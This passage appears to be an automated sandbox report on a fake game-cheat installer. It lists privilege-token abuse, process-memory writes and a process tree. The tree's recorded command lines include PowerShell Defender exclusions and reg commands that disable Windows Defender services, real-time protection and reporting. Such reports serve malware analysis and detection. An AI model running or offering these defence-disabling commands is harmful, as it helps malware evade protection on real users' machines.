N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A
N/A N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2652 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe
PID 2652 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe
PID 2652 wrote to memory of 732 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe
PID 3048 wrote to memory of 2060 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3048 wrote to memory of 2060 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3048 wrote to memory of 2060 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 732 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 732 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 732 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 3048 wrote to memory of 1544 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3048 wrote to memory of 1544 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3048 wrote to memory of 1544 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1544 wrote to memory of 3476 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1544 wrote to memory of 3476 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 3476 wrote to memory of 332 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 3476 wrote to memory of 332 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 332 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1700 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1924 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3048 wrote to memory of 4764 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3048 wrote to memory of 4764 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3048 wrote to memory of 4764 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 332 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1408 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1408 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1408 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1224 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 1864 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 548 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 4316 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 332 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 436BCDBA78A9222D8A0E6E70E430952B C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS7177.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710548300 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A209E2CDBFACC31C2DC0B48D64EDB508

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss9667.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi9654.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr9655.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr9656.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding F148C1B3E4067C7F70464215D086A31B E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSI32E7.tmp

"C:\Windows\Installer\MSI32E7.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss32FA.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi32F7.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr32F8.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr32F9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\33FC.tmp\33FD.tmp\33FE.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1844 -ip 1844

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 2164

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1844 -ip 1844

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1844 -s 2164

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSI479A.tmp

